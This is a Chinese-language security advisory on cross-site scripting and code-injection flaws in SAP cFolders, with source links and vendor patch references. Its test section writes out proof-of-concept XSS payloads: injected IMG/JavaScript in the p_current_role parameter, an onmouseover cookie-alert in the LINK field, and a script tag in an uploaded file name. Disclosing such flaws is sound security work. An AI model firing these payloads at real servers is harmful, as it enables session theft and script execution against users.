发布日期：2009-04-21
更新日期：2009-04-23

受影响系统：

SAP cFolders

描述：

---

BUGTRAQ  ID: 34658

cFolders（Collaboration Folders）是SAP基于web的信息协作共享应用程序。

Cfolders没有正确地验证对col_table_filter.htm和me_ov.htm页面所提交的p_current_role参数，远程攻击者可以通过向上述页面提交恶意请求执行跨站脚本攻击；此外如果对hyp_de_create.htm页面提交了恶意LINK字段或在文档上传区提交了带有恶意文件名的文件的话，还可以导致注入并执行恶意代码。

<*来源：Digital Security Research Group
  
  链接：http://marc.info/?l=bugtraq&m=124041179530819&w=2
        http://marc.info/?l=bugtraq&m=124041257032205&w=2
        http://secunia.com/advisories/34859/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')> https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
http://test.com" onmouseover="alert(document.cookie)">
aaaa"><script>alert()</script>.doc

建议：

---

厂商补丁：

SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://service.sap.com/sap/support/notes/1284360
https://service.sap.com/sap/support/notes/1292875

浏览次数：2383
严重程度：0（网友投票）